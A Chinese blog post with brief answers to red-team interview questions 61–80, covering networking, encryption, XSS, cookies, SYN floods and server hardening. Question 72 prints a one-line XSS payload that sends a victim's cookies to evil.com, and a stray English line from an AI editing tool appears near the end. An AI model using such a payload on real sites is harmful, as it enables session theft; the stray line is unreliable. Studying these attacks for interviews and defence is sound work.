网上收集的红队面试题详细解析(四)【61-80题】

约 8 分钟读完

网上收集的红队面试题详细解析(四)【61-80题】


61. 主机被入侵,你会如何处理这件事自查解决方案:

原理:

  • 及时隔离主机,分析入侵路径,查杀后门,修复漏洞,恢复数据。

举例:

  • 断网,查找异常进程和文件,分析日志,恢复备份,升级补丁。

进阶:

  • 建议重装系统,定期备份,建立应急响应流程。

62. NAT(网络地址转换)协议

原理:

  • NAT将私有IP地址转换为公网IP,实现内网设备访问互联网。

举例:

  • 家庭路由器通过NAT让多台设备共享一个公网IP。

进阶:

  • 支持端口映射,隐藏内网结构,提升安全性。

63. 内网穿透

原理:

  • 让外部网络访问内网服务,常用端口映射、反向代理等技术。

举例:

  • 使用frp、ngrok等工具实现远程访问内网主机。

进阶:

  • 风险:易被攻击,需加强认证和访问控制。

64. 虚拟专用网络

原理:

  • VPN通过加密隧道连接远程网络,实现安全通信。

举例:

  • 远程办公通过VPN访问公司内网资源。

进阶:

  • 支持多种协议(PPTP、L2TP、IPSec、SSL),可防止数据窃听。

65. 二层交换机

原理:

  • 工作在OSI模型数据链路层,基于MAC地址转发数据帧。

举例:

  • 局域网内设备通过二层交换机互联。

进阶:

  • 不支持路由,无法跨网段通信。

66. 路由技术

原理:

  • 路由器根据IP地址选择最佳路径转发数据包,实现不同网络间通信。

举例:

  • 家庭路由器连接内网和互联网。

进阶:

  • 支持静态路由、动态路由(RIP、OSPF、BGP)。

67. 三层交换机

原理:

  • 兼具交换机和路由器功能,支持基于IP地址的三层转发。

举例:

  • 企业网络用三层交换机实现跨网段高速通信。

进阶:

  • 性能高,适合大型网络核心层。

68. IPv6 地址表示

原理:

  • IPv6地址128位,采用冒号分隔的16进制表示,如:2001:0db8:85a3:0000:0000:8a2e:0370:7334。

举例:

  • 简写规则:连续的0可用::代替。

进阶:

  • IPv6解决IPv4地址枯竭,支持更多设备接入。

69. 对称加密非对称加密?

原理:

  • 对称加密:同一密钥加解密,速度快,密钥分发难。
  • 非对称加密:公钥加密,私钥解密,安全性高,速度慢。

举例:

  • 对称:AES、DES;非对称:RSA、ECC。

进阶:

  • 实际应用常结合使用,如HTTPS。

70. 什么是同源策略?

原理:

  • 浏览器安全机制,限制不同源之间的资源访问,防止恶意网站窃取数据。

举例:

进阶:

  • 可通过CORS跨域资源共享进行授权访问。

71. cookie 存在哪里?可以打开吗

原理:

  • cookie存储在浏览器本地,可通过开发者工具查看和编辑。

举例:

  • F12打开开发者工具,Application/Cookies标签查看cookie。

进阶:

  • 服务端也能通过HTTP头设置和读取cookie。

72. xss 如何盗取 cookie?

原理:

  • 利用XSS漏洞注入恶意JS代码,读取document.cookie并发送到攻击者服务器。

举例:

<script>fetch('http://evil.com/?c='+document.cookie)</script>

进阶:

  • 若cookie设置了HttpOnly属性,则JS无法读取。

73. tcp、udp 的区别及 tcp 三次握手,syn 攻击?

原理:

  • TCP:面向连接,可靠传输,三次握手建立连接。
  • UDP:无连接,不保证可靠,速度快。
  • SYN攻击:发送大量SYN包,耗尽服务器资源。

举例:

  • TCP用于网页,UDP用于视频;SYN Flood攻击导致服务器拒绝服务。

进阶:

  • 防御:SYN Cookie、限速、流量清洗。

74. 证书要考哪些?

原理:

  • 网络安全相关证书有CISP、CISSP、CEH、OSCP等。

举例:

  • CISP(注册信息安全专业人员)、CEH(注册白帽黑客)。

进阶:

  • 证书提升专业能力和就业竞争力。

75. DVWA 是如何搭建的?

原理:

  • DVWA是一个用于安全测试的靶场环境,需搭建LAMP/WAMP环境。

举例:

  • 安装Apache、MySQL、PHP,下载DVWA源码,配置数据库。

进阶:

  • 用于练习SQL注入、XSS、CSRF等漏洞。

76. 渗透测试的流程是什么

原理:

  • 信息收集、漏洞扫描、利用漏洞、权限提升、内网渗透、痕迹清理、报告撰写。

举例:

  • 先用nmap扫描端口,再用漏洞工具测试,最后整理报告。

进阶:

  • 每步需遵守法律和道德规范。

77. xss 如何防御

原理:

  • 输入输出严格过滤,转义特殊字符,设置HttpOnly、Content-Security-Policy等。

举例:

  • 后端对用户输入进行html实体编码,前端设置CSP禁止外部脚本。

进阶:

  • 使用安全框架如OWASP ESAPI,定期安全测试。

78. IIS 服务器应该做哪些方面的保护措施:

原理:

  • 关闭不必要服务,限制权限,定期更新补丁,配置安全策略。

举例:

  • 禁用WebDAV、FTP等不必要模块,设置访问控制。

进阶:

  • 配置日志审计,启用WAF,定期备份。

79. 虚拟机的几种连接方式及原理

原理:

  • 桥接模式:虚拟机与物理机同网段。
  • NAT模式:虚拟机通过主机共享网络。
  • 主机模式:虚拟机仅与主机通信。

举例:

  • 桥接适合测试真实网络环境,NAT适合隔离环境。

进阶:

  • 根据需求选择连接方式,注意安全隔离。

80. xss 有 cookie 一定可以无用户名密码登录吗?

原理:

  • 不一定。部分网站cookie绑定IP、UA或有二次验证,单纯拿到cookie未必能直接登录。

举例:

  • 某些银行网站cookie和设备信息绑定,盗取cookie无法复现登录态。

进阶:

  • 实战中需结合会话机制分析。

IMPORTANT: For any future changes to this file, use the final_file_content shown above as your reference. This content reflects the current state of the file, including any auto-formatting (e.g., if you used single quotes but the formatter converted them to double quotes). Always base your SEARCH/REPLACE operations on this final version to ensure accuracy.

← 表达式注入漏洞 网上收集的红队面试题详细解析(二)【21-40题】 →